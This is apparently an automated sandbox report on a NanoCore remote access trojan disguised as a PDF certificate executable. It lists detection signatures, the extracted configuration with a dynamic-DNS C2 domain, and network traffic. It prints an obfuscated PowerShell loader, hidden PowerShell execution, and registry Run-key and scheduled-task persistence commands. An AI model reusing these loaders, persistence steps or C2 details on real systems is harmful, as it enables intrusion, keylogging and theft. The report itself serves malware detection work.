5.2.CasPol.exe.244c0000.6.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xf778:$x2: NanoCore.ClientPlugin 0xf7ad:$x3: NanoCore.ClientPluginHost 0xf76c:$i2: IClientData 0xf78e:$i3: IClientNetwork 0xf79d:$i5: IClientDataHost 0xf7c7:$i6: IClientLoggingHost 0xf7da:$i7: IClientNetworkHost 0xf7ed:$i8: IClientUIHost 0xf7fb:$i9: IClientNameObjectCollection 0xf817:$i10: IClientReadOnlyNameObjectCollection 0xf56a:$s1: ClientPlugin 0xf781:$s1: ClientPlugin 0x147a2:$s6: get_ClientSettings
5.2.CasPol.exe.244c0000.6.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xf7ad:$a1: NanoCore.ClientPluginHost 0xf778:$a2: NanoCore.ClientPlugin 0x146f3:$b1: get_BuilderSettings 0x14662:$b7: LogClientException 0xf7c7:$b9: IClientLoggingHost
5.2.CasPol.exe.229eeadc.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.CasPol.exe.229eeadc.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
5.2.CasPol.exe.229eeadc.3.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xd978:$x2: NanoCore.ClientPlugin 0xd9ad:$x3: NanoCore.ClientPluginHost 0xd96c:$i2: IClientData 0xd98e:$i3: IClientNetwork 0xd99d:$i5: IClientDataHost 0xd9c7:$i6: IClientLoggingHost 0xd9da:$i7: IClientNetworkHost 0xd9ed:$i8: IClientUIHost 0xd9fb:$i9: IClientNameObjectCollection 0xda17:$i10: IClientReadOnlyNameObjectCollection 0xd76a:$s1: ClientPlugin 0xd981:$s1: ClientPlugin 0x129a2:$s6: get_ClientSettings
5.2.CasPol.exe.229eeadc.3.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xd9ad:$a1: NanoCore.ClientPluginHost 0xd978:$a2: NanoCore.ClientPlugin 0x128f3:$b1: get_BuilderSettings 0x12862:$b7: LogClientException 0xd9c7:$b9: IClientLoggingHost
5.2.CasPol.exe.229eeadc.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.CasPol.exe.229eeadc.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x287a9:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x287d6:$x2: IClientNetworkHost
5.2.CasPol.exe.229eeadc.3.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xf778:$x2: NanoCore.ClientPlugin 0x28774:$x2: NanoCore.ClientPlugin 0xf7ad:$x3: NanoCore.ClientPluginHost 0x287a9:$x3: NanoCore.ClientPluginHost 0xf76c:$i2: IClientData 0x28768:$i2: IClientData 0xf78e:$i3: IClientNetwork 0x2878a:$i3: IClientNetwork 0xf79d:$i5: IClientDataHost 0x28799:$i5: IClientDataHost 0xf7c7:$i6: IClientLoggingHost 0x287c3:$i6: IClientLoggingHost 0xf7da:$i7: IClientNetworkHost 0x287d6:$i7: IClientNetworkHost 0xf7ed:$i8: IClientUIHost 0x287e9:$i8: IClientUIHost 0xf7fb:$i9: IClientNameObjectCollection 0x287f7:$i9: IClientNameObjectCollection 0xf817:$i10: IClientReadOnlyNameObjectCollection 0x28813:$i10: IClientReadOnlyNameObjectCollection 0xf56a:$s1: ClientPlugin
5.2.CasPol.exe.229eeadc.3.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xf7ad:$a1: NanoCore.ClientPluginHost 0x287a9:$a1: NanoCore.ClientPluginHost 0xf778:$a2: NanoCore.ClientPlugin 0x28774:$a2: NanoCore.ClientPlugin 0x146f3:$b1: get_BuilderSettings 0x2d6ef:$b1: get_BuilderSettings 0x14662:$b7: LogClientException 0x2d65e:$b7: LogClientException 0xf7c7:$b9: IClientLoggingHost 0x287c3:$b9: IClientLoggingHost
5.2.CasPol.exe.229e9ca6.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.CasPol.exe.229e9ca6.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d595:$a: NanoCore 0x2d5aa:$a: NanoCore 0x2d5df:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2d351:$b: ClientPlugin 0x2d36c:$b: ClientPlugin
5.2.CasPol.exe.229e9ca6.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d5df:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d60c:$x2: IClientNetworkHost
5.2.CasPol.exe.229e9ca6.1.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe38:$x2: NanoCore.ClientPlugin 0x145ae:$x2: NanoCore.ClientPlugin 0x2d5aa:$x2: NanoCore.ClientPlugin 0xe75:$x3: NanoCore.ClientPluginHost 0x145e3:$x3: NanoCore.ClientPluginHost 0x2d5df:$x3: NanoCore.ClientPluginHost 0xe5a:$i1: IClientApp 0xe4e:$i2: IClientData 0x145a2:$i2: IClientData 0x2d59e:$i2: IClientData 0xe29:$i3: IClientNetwork 0x145c4:$i3: IClientNetwork 0x2d5c0:$i3: IClientNetwork 0xec3:$i4: IClientAppHost 0xe65:$i5: IClientDataHost 0x145d3:$i5: IClientDataHost 0x2d5cf:$i5: IClientDataHost 0xeb0:$i6: IClientLoggingHost 0x145fd:$i6: IClientLoggingHost 0x2d5f9:$i6: IClientLoggingHost 0xe8f:$i7: IClientNetworkHost
5.2.CasPol.exe.229e9ca6.1.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe75:$a1: NanoCore.ClientPluginHost 0x145e3:$a1: NanoCore.ClientPluginHost 0x2d5df:$a1: NanoCore.ClientPluginHost 0xe38:$a2: NanoCore.ClientPlugin 0x145ae:$a2: NanoCore.ClientPlugin 0x2d5aa:$a2: NanoCore.ClientPlugin 0x120c:$b1: get_BuilderSettings 0x19529:$b1: get_BuilderSettings 0x32525:$b1: get_BuilderSettings 0xec3:$b4: IClientAppHost 0x127d:$b6: AddHostEntry 0x12ec:$b7: LogClientException 0x19498:$b7: LogClientException 0x32494:$b7: LogClientException 0x1261:$b8: PipeExists 0xeb0:$b9: IClientLoggingHost 0x145fd:$b9: IClientLoggingHost 0x2d5f9:$b9: IClientLoggingHost
5.2.CasPol.exe.219b1858.0.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
5.2.CasPol.exe.219b1858.0.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe38:$x2: NanoCore.ClientPlugin 0xe75:$x3: NanoCore.ClientPluginHost 0xe5a:$i1: IClientApp 0xe4e:$i2: IClientData 0xe29:$i3: IClientNetwork 0xec3:$i4: IClientAppHost 0xe65:$i5: IClientDataHost 0xeb0:$i6: IClientLoggingHost 0xe8f:$i7: IClientNetworkHost 0xea2:$i8: IClientUIHost 0xed2:$i9: IClientNameObjectCollection 0xef7:$i10: IClientReadOnlyNameObjectCollection 0xe41:$s1: ClientPlugin 0x177c:$s1: ClientPlugin 0x1789:$s1: ClientPlugin 0x11f9:$s6: get_ClientSettings 0x1249:$s7: get_Connected
5.2.CasPol.exe.219b1858.0.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe75:$a1: NanoCore.ClientPluginHost 0xe38:$a2: NanoCore.ClientPlugin 0x120c:$b1: get_BuilderSettings 0xec3:$b4: IClientAppHost 0x127d:$b6: AddHostEntry 0x12ec:$b7: LogClientException 0x1261:$b8: PipeExists 0xeb0:$b9: IClientLoggingHost
Click to see the 30 entries

Sigma Signatures

AV Detection

Sigma detected: NanoCore

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ProcessId: 1072, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

E-Banking Fraud

Sigma detected: NanoCore

Source: File created

System Summary

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Fordaervet Kauch Ticklenburg Synonymized Nippers Hysse #>$Boarspear = """Pe;ReF SuSunSkc OtPri Po Cn D AeBCarTju Cd Kg coAsmSemDee M0Wa4 K B{St Do Tr U KopTeaFor oaatmNo(Ov[HaSPot Fr UiSlnSpgVo] H`$PiS Ca UlSteAns FwDio Om Fe Un p)Re; D De d A D`$ RT Fh viChoOpt Ch Wr Ti Ex T No= R SNNoeInwUd-OcOReb UjFoe ScGotOc MebMiyLdtPreIn[Fo] P Sc(Ib`$ CSSpa ll UeEns MwSeoGdm BeDynAn.InL De An BgJot Ch P Fo/Co A2Su) I; D Ma Sc F FlFFyoSlrMe(Sc`$ PA DnPitPai FlMuaTrbAso PrSks K=Pa0Ra;Bi B`$BaA Nn GtPoi LlspaRabHvo SrBls V Pr- Ml AtBo Fa`$PaSDia SlOpeBaslew So Sm Ze MnSl.LyLVaeDrn Yg Ft Dh T;Il Lf`$ PA pnHyt Ci NlEkaTabFioStrSks C+ I=Li2An)Af{Ku D Sk E St Ku Pe Fo Fa`$ekT BhSei SogutBehinr uiVaxUn[Ta`$BiAYondat SiRelIma AbGuo Nr Ws t/ T2 P] F No= O Pa[uncGloInn BvPye SrUntSe]Im: U:CaTTho PBSyyantAueUn(Fj`$ SS Ia Tl SeMes Fw Bo bmfoeBonSu.KlS au Kb Ss MtLor TiSpnAng Z(St`$PhAUnnsatBui HlFoaMybMioSorTus D, I Er2un) G,In au1Mu6Ca)Mi;En Re Ti`$ReT Fh SiRooFit Sh PrSoi DxSv[ar`$GaACinTrtEdi Slbra NbIno Or AsTa/Tr2Sk]Br P=Ud Un(Su`$SaTIthEfiBao Ct BhAlrFli Txga[Pa`$SnAWinBrt CiUnlKraOdbMeo ArHlsMi/Sp2Vi]Br L-FobVaxSpoDerCa K1 S1Fo8Mb) f;Sy P L Y Ty}Re Ki[ DSEnt Sr FiAnnStgSl]St[SaS KyGis Lt Ue fmPa. STPle pxgotAb. SEBrnSuc Ko rdAfiunn Pg b] K: S: RA IS SCSlI LINo.TeG de BtAmSditPur Zi PnHag T(Ca`$DaTGrhCiiscoUntRuhRorUsiSax M)As;Dd} s`$ViS PkOarfim Ga Ar mbMae SjAmd Re OsEp0 O=InBDerBauVid SgNooInmHymSkeDa0Ar4 I Bo' D2Ek5Nu0StFFa0Hu5 S0Un2Dj1 U3De1 tB K5Cl8 T1Ma2 I1 NAAn1BiAPe' S;Pr`$ KSUdkLarMum JaudrAfb ReKlj AdAkeBrsSt1fo=GoBBrr PuTrdPegProLam Pmame P0Gu4 R Uf' R3MiBbl1YnFAs1 R5Ec0My4 M1 S9Ro0De5 S1Bj9 N1 H0Ga0 U2 M5Ra8No2 A1De1 SFTo1 I8 R4Op5 R4Pa4Ni5 S8 J2 O3St1Ko8 S0Be5in1In7ud1Ov0Fo1 b3 S3Un8Bi1 L7 L0 K2Fl1 MF E0Ma0Ov1Qu3Ge3 bBEr1De3cl0Fi2 K1 OESc1 B9 L1 A2 M0 B5Ko'Ou; F`$SlS skHkrStm CaAnr UbExe AjKodTre AsSk2Ge= FBGar suScdImgSkoKam sm DePr0Co4Br Sa' A3 S1Ko1Sj3Ja0 S2Un2 L6Sc0Bu4 M1Be9 I1 G5 D3Sp7 S1Dy2Wi1 S2 G0 E4 P1In3 A0 V5Bt0Bu5In'mo;sm`$PrSSik IrGrmafa ArUnbSte SjModPieVas H3Av=PjB Mr Bu udOlg woWim Mm Me U0ha4 S De' F2 v5Sw0obFAs0fo5 B0 S2Ma1 S3 S1 FBMo5Do8Ge2V 4Us0 A3 s1 M8Xa0Sl2Fl1VeF S1DeB Q1 U3ma5 a8Re3AnFWi1 G8 T0 D2Sy1po3Ny0 D4Bo1 E9 S0Fo6 P2Av5 L1Re3Un0sn4Ag0Co0ba1 FF T1 P5 o1Ke3 C0Bo5 O5Un8No3 sE P1Re7 T1nu8Vr1Gr2 R1MiA S1Ra3Ge2Un4 U1Ov3 C1Ud0Hd'Ro;Ru`$JoS UkAfr Sm IaSerMob IeFljUddWieFes G4 K= IB KrdruTidDegNoo cmbim keWa0 P4Ru Se'Te0Di5Re0Un2Pr0Co4 R1BrFSp1se8 G1Fl1Pu'Il;Se`$KeSFukUfrThm Na LrVib Se Fj UdPaeBasAn5un=StBDyr Au TdSjg PoKumLdm te L0Im4Lo Ne'Gy3Pe1Bl1 D3Hy0Br2Ko3LiBPa1be9Ma1Vi2Tr0su3Se1 PA T1 M3Mo3HaESu1No7Gr1 R8 T1Ke2St1 SA U1St3 V'Ji;Tr`$beSTakMir HmDoa FrSvbVieOljlad CeTrsAf6 D=PeB CrMau RdRegMio Wm bmBoe U0Bl4 F my' V2Rn4Ge2Ge2 G2cl5 A0On6 F1Ti3Ap1Hj5sj1AtFSk1 F7 T1 MA s3 C8 M1 N7Ok1 TB E1Fo3 B5PrAUt5Eu6Dv3 VE s1 IF E1Bo2Hy1 V3 A3 E4 B0RoFRe2Fa5 O1 AFAl1Fa1Te5boA I5Be6 H2 R6 B0Su3Sm1 G4Fu1 KAOb1AnF H1tr5Hy' G;bo`$CoSDekLurSum AaStrCob eePrjbid Ee

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Ec32% -windowstyle minimized $Engrams252=(Get-ItemProperty -Path 'HKCU:\Jgerstuerne\').Curatives;%Ec32% -windowstyle minimized ($Engrams252), EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ProcessId: 1072, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp", CommandLine: "schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp", CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ParentProcessId: 1072, ParentProcessName: CasPol.exe, ProcessCommandLine: "schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp", ProcessId: 3408, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\Kommandosyntaksen.Knk' ; powershell.exe ''$cas'', CommandLine: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\Kommandosyntaksen.Knk' ; powershell.exe ''$cas'', CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Certificate#U00b7pdf.exe", ParentImage: C:\Users\user\Desktop\Certificate#U00b7pdf.exe, ParentProcessId: 4180, ParentProcessName: Certificate#U00b7pdf.exe, ProcessCommandLine: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\Kommandosyntaksen.Knk' ; powershell.exe ''$cas'', ProcessId: 5620, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp", CommandLine: "schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp", CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ParentProcessId: 1072, ParentProcessName: CasPol.exe, ProcessCommandLine: "schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp", ProcessId: 3408, ProcessName: schtasks.exe

Stealing of Sensitive Information

Sigma detected: NanoCore

Source: File created

Remote Access Functionality

Sigma detected: NanoCore

Source: File created

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: 7fxcmft-olcmjfjxdk.duckdns.org

Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "48e0e383-40c8-47b1-a4ea-d717ed94", "Group": "Default", "Domain1": "7fxcmft-olcmjfjxdk.duckdns.org", "Domain2": "", "Port": 3342, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "7fxcmft-olcmjfjxdk.duckdns.org", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}

Multi AV Scanner detection for domain / URL

Source: 7fxcmft-olcmjfjxdk.duckdns.org	Virustotal: Detection: 11%	Perma Link
Source: http://pesterbdd.com/images/Pester.png4	Virustotal: Detection: 10%	Perma Link
Source: http://pesterbdd.com/images/Pester.png	Virustotal: Detection: 9%	Perma Link
Source: 7fxcmft-olcmjfjxdk.duckdns.org	Virustotal: Detection: 11%	Perma Link

Multi AV Scanner detection for submitted file

Source: Certificate#U00b7pdf.exe	ReversingLabs: Detection: 31%
Source: Certificate#U00b7pdf.exe	Virustotal: Detection: 53%			Perma Link

Yara detected Nanocore RAT

Source: Yara match	File source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 1072, type: MEMORYSTR

Machine Learning detection for sample

Source: Certificate#U00b7pdf.exe

Joe Sandbox ML: detected

Source: Certificate#U00b7pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 142.250.191.110:443 -> 192.168.11.20:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.191.129:443 -> 192.168.11.20:49777 version: TLS 1.2

Source: Certificate#U00b7pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: !x""f.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021890000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: !indows\System.pdbpdbtem.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: !em.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021890000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Code function: 0_2_004065DA FindFirstFileW,FindClose,		0_2_004065DA
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		0_2_004059A9

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs:
Source: Malware configuration extractor	URLs: 7fxcmft-olcmjfjxdk.duckdns.org

Uses dynamic DNS services

Source: unknown

DNS query: name: 7fxcmft-olcmjfjxdk.duckdns.org

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

